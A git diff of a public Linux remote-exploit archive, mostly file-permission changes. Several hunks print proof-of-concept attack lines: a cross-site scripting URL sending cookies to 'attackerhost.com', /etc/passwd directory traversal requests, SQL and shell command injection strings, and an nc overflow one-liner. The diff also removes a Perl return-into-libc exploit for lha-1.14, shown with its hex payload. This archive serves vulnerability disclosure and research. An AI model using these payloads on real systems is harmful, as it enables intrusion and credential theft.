diff --git a/platforms/linux/remote/208.c b/platforms/linux/remote/208.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20902.c b/platforms/linux/remote/20902.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20908.c b/platforms/linux/remote/20908.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20924.txt b/platforms/linux/remote/20924.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20929.c b/platforms/linux/remote/20929.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20936.c b/platforms/linux/remote/20936.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20953.c b/platforms/linux/remote/20953.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/20994.txt b/platforms/linux/remote/20994.txt old mode 100755 new mode 100644 index 98839932c..658109e1e --- a/platforms/linux/remote/20994.txt +++ b/platforms/linux/remote/20994.txt @@ -13,4 +13,4 @@ ehlo dumbcobalt mail from:"POP login by user "admin" at (66.66.66.66) 66.66.66.66 @linux.org" 553 "POP login by user "admin" at (66.66.66.66) 66.66.66.66 -@linux.org"...Domain name required \ No newline at end of file +@linux.org"...Domain name required \ No newline at end of file diff --git a/platforms/linux/remote/20998.c b/platforms/linux/remote/20998.c old mode 100755 new mode 100644 index ea68e672b..64ede3bd5 --- a/platforms/linux/remote/20998.c +++ b/platforms/linux/remote/20998.c @@ -1,12 +1,13 @@ -source: http://www.securityfocus.com/bid/3006/info +// source: http://www.securityfocus.com/bid/3006/info +// +// xloadimage is a utility used for displaying images of varying formats on X11 servers. +// +// xloadimage and possibly derivatives such as 'xli' contain a buffer overflow vulnerability in the handling of the 'Faces Project' image type. +// +// It is possible for remote attackers to create a file that will exploit this overflow to execute arbitrary code. An optional netscape plugin shipped with Red Hat powertools invokes xloadimage to load certain image types. If this plugin is in use, this vulnerability may be remotely exploitable if an attacker places the exploit-file on a webserver. +// +// S.uS.E. Linux also ships with plugger, which invokes a derivative of xloadimage called 'xli'. 'xli' is also vulnerable. -xloadimage is a utility used for displaying images of varying formats on X11 servers. - -xloadimage and possibly derivatives such as 'xli' contain a buffer overflow vulnerability in the handling of the 'Faces Project' image type. - -It is possible for remote attackers to create a file that will exploit this overflow to execute arbitrary code. An optional netscape plugin shipped with Red Hat powertools invokes xloadimage to load certain image types. If this plugin is in use, this vulnerability may be remotely exploitable if an attacker places the exploit-file on a webserver. - -S.uS.E. Linux also ships with plugger, which invokes a derivative of xloadimage called 'xli'. 'xli' is also vulnerable. //#define TARGET 0x080e1337 //as 1337 as the 1337357 kiddies. diff --git a/platforms/linux/remote/21017.txt b/platforms/linux/remote/21017.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21019.txt b/platforms/linux/remote/21019.txt old mode 100755 new mode 100644 index 3741bdd92..eba6feb98 --- a/platforms/linux/remote/21019.txt +++ b/platforms/linux/remote/21019.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in Horde Imp which may allow an attacker to By specifying a malicious INBOX file in a request, the contents of the file may be disclosed to a remote attacker. All files would be accessed with the privileges of the user invoking Imp. -http://vulnerableserver/horde/imp/mailbox.php?mailbox=/etc/passwd \ No newline at end of file +http://vulnerableserver/horde/imp/mailbox.php?mailbox=/etc/passwd \ No newline at end of file diff --git a/platforms/linux/remote/21037.c b/platforms/linux/remote/21037.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21049.c b/platforms/linux/remote/21049.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21050.c b/platforms/linux/remote/21050.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21075.txt b/platforms/linux/remote/21075.txt old mode 100755 new mode 100644 index ff6db35a4..4d50f9ac6 --- a/platforms/linux/remote/21075.txt +++ b/platforms/linux/remote/21075.txt @@ -16,4 +16,4 @@ Referer: http://szachy.org/../../../../../tmp and an example content of our /tmp/keylist.txt create like this: $ echo -e "keyword\0touch exploitable|" > /tmp/keylist.txt -After successful attempt there will be "exploitable" file in /tmp directory. \ No newline at end of file +After successful attempt there will be "exploitable" file in /tmp directory. \ No newline at end of file diff --git a/platforms/linux/remote/21095.txt b/platforms/linux/remote/21095.txt old mode 100755 new mode 100644 index 9501a084f..722f8f43d --- a/platforms/linux/remote/21095.txt +++ b/platforms/linux/remote/21095.txt @@ -11,4 +11,4 @@ cat >exploit.tex <<EOF \end EOF tex exploit.tex -lpr exploit.dvi \ No newline at end of file +lpr exploit.dvi \ No newline at end of file diff --git a/platforms/linux/remote/21112.php b/platforms/linux/remote/21112.php old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21151.txt b/platforms/linux/remote/21151.txt old mode 100755 new mode 100644 index 26127c78e..ad8d11ba9 --- a/platforms/linux/remote/21151.txt +++ b/platforms/linux/remote/21151.txt @@ -9,4 +9,4 @@ As a result, it has been proven that this issue can be exploited to steal a legi http://myimp.site.com/status.php3?message=%3Cscript%20language%3Djavascript %3E%20document.write(%27%3Cimg%20src%3Dhttp%3A%2F%2Fattackerhost.co m%2Fcookie.cgi%3Fcookie%3D%27%20%2B%20escape(document.cookie)%2B% -20%27%3E%27)%3B%3C%2Fscript%3E%0A \ No newline at end of file +20%27%3E%27)%3B%3C%2Fscript%3E%0A \ No newline at end of file diff --git a/platforms/linux/remote/21152.c b/platforms/linux/remote/21152.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21192.c b/platforms/linux/remote/21192.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21200.c b/platforms/linux/remote/21200.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21205.c b/platforms/linux/remote/21205.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21210.txt b/platforms/linux/remote/21210.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21242.c b/platforms/linux/remote/21242.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21289.c b/platforms/linux/remote/21289.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21309.c b/platforms/linux/remote/21309.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21310.txt b/platforms/linux/remote/21310.txt old mode 100755 new mode 100644 index 825d8d24b..0cf3758a9 --- a/platforms/linux/remote/21310.txt +++ b/platforms/linux/remote/21310.txt @@ -8,4 +8,4 @@ It is possible to send a maliciously formatted message to xtell such that this i Earlier versions of xtell may share this vulnerability. This has not been confirmed. -echo :USER::`perl -e 'print "A" x 2000'`| nc victimhost 4224 \ No newline at end of file +echo :USER::`perl -e 'print "A" x 2000'`| nc victimhost 4224 \ No newline at end of file diff --git a/platforms/linux/remote/21365.txt b/platforms/linux/remote/21365.txt old mode 100755 new mode 100644 index 7271ac522..9d25dc368 --- a/platforms/linux/remote/21365.txt +++ b/platforms/linux/remote/21365.txt @@ -8,4 +8,4 @@ Under normal circumstances, PHPGroupWare installs with the PHP magic_quotes_gpc Additionally, this issue may also enable an attacker to exploit vulnerabilities that may exist in the underlying database. -fubar'; CREATE TABLE thistableshouldnotexist (a int); -- \ No newline at end of file +fubar'; CREATE TABLE thistableshouldnotexist (a int); -- \ No newline at end of file diff --git a/platforms/linux/remote/21402.txt b/platforms/linux/remote/21402.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21422.txt b/platforms/linux/remote/21422.txt old mode 100755 new mode 100644 index f7f121a05..f9af971dc --- a/platforms/linux/remote/21422.txt +++ b/platforms/linux/remote/21422.txt @@ -6,4 +6,4 @@ Cross Site Scripting issues has been reported in some versions of thttpd. thttpd It should be noted that this issue was tested on 2.20b, other versions may also be affected by this issue. -http://www.host.com/<script>[SCRIPT]</script> \ No newline at end of file +http://www.host.com/<script>[SCRIPT]</script> \ No newline at end of file diff --git a/platforms/linux/remote/21442.c b/platforms/linux/remote/21442.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21443.c b/platforms/linux/remote/21443.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21586.txt b/platforms/linux/remote/21586.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21602.txt b/platforms/linux/remote/21602.txt old mode 100755 new mode 100644 index e68c8334f..1e8e101e6 --- a/platforms/linux/remote/21602.txt +++ b/platforms/linux/remote/21602.txt @@ -7,4 +7,4 @@ An attacker may exploit a directory traversal vulnerability in Icecast server to GET /file/../../../../../../../../nonexistent/ HTTP/1.0 -GET /file/../../../../../../../../etc/ HTTP/1.0 \ No newline at end of file +GET /file/../../../../../../../../etc/ HTTP/1.0 \ No newline at end of file diff --git a/platforms/linux/remote/21604.txt b/platforms/linux/remote/21604.txt old mode 100755 new mode 100644 index f44c9bc61..845536625 --- a/platforms/linux/remote/21604.txt +++ b/platforms/linux/remote/21604.txt @@ -7,4 +7,4 @@ When servlet mapping is enabled, it is possible to invoke various servlets and c tomcat-server/servlet/org.apache.catalina.servlets.WebdavStatus/<SCRIPT>alert(document.domain)</SCRIPT> tomcat-server/servlet/org.apache.catalina.ContainerServlet/<SCRIPT>alert(document.domain)</SCRIPT> tomcat-server/servlet/org.apache.catalina.Context/<SCRIPT>alert(document.domain)</SCRIPT> -tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT> \ No newline at end of file +tomcat-server/servlet/org.apache.catalina.Globals/<SCRIPT>alert(document.domain)</SCRIPT> \ No newline at end of file diff --git a/platforms/linux/remote/21663.c b/platforms/linux/remote/21663.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21706.txt b/platforms/linux/remote/21706.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21725.c b/platforms/linux/remote/21725.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21726.c b/platforms/linux/remote/21726.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21784.c b/platforms/linux/remote/21784.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21818.c b/platforms/linux/remote/21818.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21858.txt b/platforms/linux/remote/21858.txt old mode 100755 new mode 100644 index 4efe96587..25ec30038 --- a/platforms/linux/remote/21858.txt +++ b/platforms/linux/remote/21858.txt @@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/5793/info acWEB is prone to cross-site scripting attacks. It is possible to construct a malicious link to the web server which contains arbitrary script code. When the link is visited, the script code will be executed in the web client of the user visiting the link. The code will be executed in the context of the webserver. -http://www.victim.com/%db<script>alert('test');</script>/ \ No newline at end of file +http://www.victim.com/%db<script>alert('test');</script>/ \ No newline at end of file diff --git a/platforms/linux/remote/21870.txt b/platforms/linux/remote/21870.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21934.txt b/platforms/linux/remote/21934.txt old mode 100755 new mode 100644 index 035341152..f95268444 --- a/platforms/linux/remote/21934.txt +++ b/platforms/linux/remote/21934.txt @@ -4,4 +4,4 @@ A vulnerability has been discovered in the kpf file sharing utility. KDE is avai It has been reported that by passing a malicious file request to kpf, it is possible for a remote attacker to access files outside of the 'shared directory' root. The ability to read files outside of the shared root directory would be dependent upon the privileges of the kpf process. -http://127.0.0.1:8001/?icon=/usr/local/kde/share/icons/hicolor/32x32/mimetypes/image.png \ No newline at end of file +http://127.0.0.1:8001/?icon=/usr/local/kde/share/icons/hicolor/32x32/mimetypes/image.png \ No newline at end of file diff --git a/platforms/linux/remote/21936.c b/platforms/linux/remote/21936.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21937.c b/platforms/linux/remote/21937.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/21998.c b/platforms/linux/remote/21998.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/220.c b/platforms/linux/remote/220.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22012.c b/platforms/linux/remote/22012.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22013.c b/platforms/linux/remote/22013.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22016.c b/platforms/linux/remote/22016.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22026.txt b/platforms/linux/remote/22026.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22035.c b/platforms/linux/remote/22035.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22046.c b/platforms/linux/remote/22046.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22058.c b/platforms/linux/remote/22058.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22063.c b/platforms/linux/remote/22063.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22072.c b/platforms/linux/remote/22072.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22091.c b/platforms/linux/remote/22091.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22101.c b/platforms/linux/remote/22101.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22106.txt b/platforms/linux/remote/22106.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22129.c b/platforms/linux/remote/22129.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22135.c b/platforms/linux/remote/22135.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22141.c b/platforms/linux/remote/22141.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22143.txt b/platforms/linux/remote/22143.txt old mode 100755 new mode 100644 index 043be4195..ad09d035f --- a/platforms/linux/remote/22143.txt +++ b/platforms/linux/remote/22143.txt @@ -4,4 +4,4 @@ WebWeaver's FTP component has a flaw which can permit a remote user to create di By executing the mkdir command on an ftp server with dot-dot-slash (..\) directory traversal notation, an attacker can create a directory outside of the FTP root. -mkdir ..\[directoryname] \ No newline at end of file +mkdir ..\[directoryname] \ No newline at end of file diff --git a/platforms/linux/remote/22147.c b/platforms/linux/remote/22147.c old mode 100755 new mode 100644 index 48af6a0c8..1078bd3f0 --- a/platforms/linux/remote/22147.c +++ b/platforms/linux/remote/22147.c @@ -239,5 +239,4 @@ main(int argc, char **argv) close(fd); fprintf(stderr, "+ all done, %s is ready for use\n", argv[2]); exit(0); -} - \ No newline at end of file +} \ No newline at end of file diff --git a/platforms/linux/remote/22187.txt b/platforms/linux/remote/22187.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22205.txt b/platforms/linux/remote/22205.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22264.txt b/platforms/linux/remote/22264.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22274.c b/platforms/linux/remote/22274.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22291.c b/platforms/linux/remote/22291.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22342.c b/platforms/linux/remote/22342.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22346.c b/platforms/linux/remote/22346.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22353.c b/platforms/linux/remote/22353.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22361.cpp b/platforms/linux/remote/22361.cpp old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22369.txt b/platforms/linux/remote/22369.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22371.txt b/platforms/linux/remote/22371.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22379.c b/platforms/linux/remote/22379.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22454.c b/platforms/linux/remote/22454.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22479.c b/platforms/linux/remote/22479.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22485.c b/platforms/linux/remote/22485.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/225.c b/platforms/linux/remote/225.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22584.txt b/platforms/linux/remote/22584.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/226.c b/platforms/linux/remote/226.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22601.txt b/platforms/linux/remote/22601.txt old mode 100755 new mode 100644 index 603b8e42e..61b78440d --- a/platforms/linux/remote/22601.txt +++ b/platforms/linux/remote/22601.txt @@ -4,4 +4,4 @@ Inktomi Traffic Server is prone to a cross-site scripting vulnerability. This is Exploitation could permit HTML and script code to access properties of the domain that is requested through the proxy. -http://<spoofed_domain>:443/</em><script>alert()</script> \ No newline at end of file +http://<spoofed_domain>:443/</em><script>alert()</script> \ No newline at end of file diff --git a/platforms/linux/remote/22622.txt b/platforms/linux/remote/22622.txt old mode 100755 new mode 100644 index 101758857..6cb3784e6 --- a/platforms/linux/remote/22622.txt +++ b/platforms/linux/remote/22622.txt @@ -7,4 +7,4 @@ bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. -GET /dir/../../../../../../etc/passwd HTTP/1.0 \ No newline at end of file +GET /dir/../../../../../../etc/passwd HTTP/1.0 \ No newline at end of file diff --git a/platforms/linux/remote/22623.txt b/platforms/linux/remote/22623.txt old mode 100755 new mode 100644 index 4bb79d1c2..bfa5194a1 --- a/platforms/linux/remote/22623.txt +++ b/platforms/linux/remote/22623.txt @@ -6,4 +6,4 @@ bash$ telnet wsmp3.server.com 8000 Trying 61.37.xxx.xx... Connected to 61.37.xxx.xx. Escape character is '^]'. -POST /dir/../../../../../../bin/ps HTTP/1.0 \ No newline at end of file +POST /dir/../../../../../../bin/ps HTTP/1.0 \ No newline at end of file diff --git a/platforms/linux/remote/22659.c b/platforms/linux/remote/22659.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/227.c b/platforms/linux/remote/227.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/2274.c b/platforms/linux/remote/2274.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22771.txt b/platforms/linux/remote/22771.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22786.c b/platforms/linux/remote/22786.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22830.c b/platforms/linux/remote/22830.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22848.c b/platforms/linux/remote/22848.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22873.c b/platforms/linux/remote/22873.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22893.c b/platforms/linux/remote/22893.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22894.c b/platforms/linux/remote/22894.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22908.c b/platforms/linux/remote/22908.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22968.c b/platforms/linux/remote/22968.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/22969.c b/platforms/linux/remote/22969.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/230.c b/platforms/linux/remote/230.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23049.c b/platforms/linux/remote/23049.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23054.txt b/platforms/linux/remote/23054.txt old mode 100755 new mode 100644 index 523e52d02..a0d301540 --- a/platforms/linux/remote/23054.txt +++ b/platforms/linux/remote/23054.txt @@ -8,4 +8,4 @@ This will generate the following message: unknown AP essid= uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel) sh: -c: line 3: unexpected EOF while looking for matching `'' -sh: -c: line 4: syntax error: unexpected end of file \ No newline at end of file +sh: -c: line 4: syntax error: unexpected end of file \ No newline at end of file diff --git a/platforms/linux/remote/23082.txt b/platforms/linux/remote/23082.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23115.c b/platforms/linux/remote/23115.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23151.c b/platforms/linux/remote/23151.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23161.c b/platforms/linux/remote/23161.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23162.c b/platforms/linux/remote/23162.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23171.c b/platforms/linux/remote/23171.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23182.c b/platforms/linux/remote/23182.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23183.c b/platforms/linux/remote/23183.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23186.txt b/platforms/linux/remote/23186.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23188.c b/platforms/linux/remote/23188.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23196.c b/platforms/linux/remote/23196.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23295.txt b/platforms/linux/remote/23295.txt old mode 100755 new mode 100644 index f842082b8..96c734432 --- a/platforms/linux/remote/23295.txt +++ b/platforms/linux/remote/23295.txt @@ -6,4 +6,4 @@ A problem has been identified in the handling of some characters by sh-httpd. Be GET * GET ../../../sh-httpd/p* GET /../../etc/s* -GET ../../root/.b* \ No newline at end of file +GET ../../root/.b* \ No newline at end of file diff --git a/platforms/linux/remote/23296.txt b/platforms/linux/remote/23296.txt old mode 100755 new mode 100644 index b6d0ac4b2..56c10116b --- a/platforms/linux/remote/23296.txt +++ b/platforms/linux/remote/23296.txt @@ -6,4 +6,4 @@ Successful exploits will disclose sensitive information that may be useful in fu This problem has been reported to exist in Apache 2.0.40 shipped with Red Hat Linux 9.0. Other versions may be affected as well. -http://ip_address:port// \ No newline at end of file +http://ip_address:port// \ No newline at end of file diff --git a/platforms/linux/remote/23306.c b/platforms/linux/remote/23306.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23366.c b/platforms/linux/remote/23366.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23368.c b/platforms/linux/remote/23368.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23369.c b/platforms/linux/remote/23369.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23371.c b/platforms/linux/remote/23371.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23413.c b/platforms/linux/remote/23413.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23441.c b/platforms/linux/remote/23441.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23585.txt b/platforms/linux/remote/23585.txt old mode 100755 new mode 100644 index b09ca1f64..d5f583eeb --- a/platforms/linux/remote/23585.txt +++ b/platforms/linux/remote/23585.txt @@ -36,4 +36,4 @@ Example 2: <<< HTTP/1.0 200 OK <<< finjan-version: fhttp/1.0 <<< -<<< \ No newline at end of file +<<< \ No newline at end of file diff --git a/platforms/linux/remote/23604.txt b/platforms/linux/remote/23604.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23671.txt b/platforms/linux/remote/23671.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/237.c b/platforms/linux/remote/237.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23728.txt b/platforms/linux/remote/23728.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23772.c b/platforms/linux/remote/23772.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23777.txt b/platforms/linux/remote/23777.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23794.txt b/platforms/linux/remote/23794.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23801.txt b/platforms/linux/remote/23801.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23802.txt b/platforms/linux/remote/23802.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23803.txt b/platforms/linux/remote/23803.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23811.c b/platforms/linux/remote/23811.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23848.txt b/platforms/linux/remote/23848.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23864.txt b/platforms/linux/remote/23864.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/23881.txt b/platforms/linux/remote/23881.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24.c b/platforms/linux/remote/24.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24038.txt b/platforms/linux/remote/24038.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24079.c b/platforms/linux/remote/24079.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24093.c b/platforms/linux/remote/24093.c old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24105.txt b/platforms/linux/remote/24105.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24106.txt b/platforms/linux/remote/24106.txt old mode 100755 new mode 100644 diff --git a/platforms/linux/remote/24120.c b/platforms/linux/remote/24120.c deleted file mode 100755 index 7c716fb8f..000000000 --- a/platforms/linux/remote/24120.c +++ /dev/null @@ -1,128 +0,0 @@ -source: http://www.securityfocus.com/bid/10354/info - -LHA has been reported prone to multiple vulnerabilities that may allow a malicious archive to execute arbitrary code or corrupt arbitrary files when the archive is operated on. These issues are triggered in the 'extract_one()' and are due to a failure of the application to properly validate string lengths in offending files. - -These issues might allow an attacker to execute code in the context of a user invoking the affected utility. - -Exploiting lha-1.14 (after security advisories) -19 May, 2004 -Copyright (2004) Lukasz Wojtow <lw@wszia.edu.pl> - -At the time of writing this text, some vulnerabilities have been discovered -and fixed, but not all (i've sent info to major linux distributions and -Bugtraq, but they didn't seem to bother). -This code creates an archive, which decompressed with lha-1.14 -will cause a buffer overflow. The bug is in function extract_one (there are a -lot of bugs, actually). At first it looked like like a typical stack overflow, -but after a couple of thoughts it was obvious that returnig on the stack was -impossible (due to special 0xff handling). The only option came to my mind -was return-into-libc. -Addresses inside this code do system("/tmp/lhXXXXXX") and exit(). -Before exploiting 3 addresses have to be obtained: -- system function, -- exit function (not really needed, but SEGFAULT could be noticed), -- address of /tmp/lhXXXXXX inside exploitet binary. -Put these addresses into their place in the code (in little endian order -on x86) and run: -./code > archive.lhz - -then command -lha -e archive.lhz -will cause execution of /tmp/lhXXXXXX -Enjoy - ----CODE START--- - -#!/usr/bin/perl -my $exit_addr= "\x50\xf2\x4\x40"; -my $system_addr= "\x30\x65\x6\x40"; -my $tmp_string= "\xfa\x1e\x5\x8"; - -print "\x19\x8d\x2d\x6c\x68\x64\x2d\x18\x0\x0\x0\x0\x0\x0\x0\xe1\xa5". - "\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0". - "\x0\x0\x5\x0\x2\x46\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\xde". - "\x2d\x6c\x68\x64\x2d\x69\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20". - "\x1\x0\x0\x0\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\x56\x0\x2". - "\x46\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x2f\x2d\x6c\x68". - "\x64\x2d\xba\x0\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0". - "\x55\x5\x0\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xa7\x0\x2\x46\xff\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\xff\x7\x0\x54\x37\x68\xaa\x40\x0\x0\x19\x81\x2d\x6c\x68\x64\x2d". - "\xb\x1\x0\x0\x0\x0\x0\x0\xe1\xa5\xb2\x30\x20\x1\x0\x0\x0\x55\x5\x0". - "\x50\xed\x41\x7\x0\x51\x0\x0\x0\x0\xf8\x0\x2\x46\xff\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\xff\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41". - 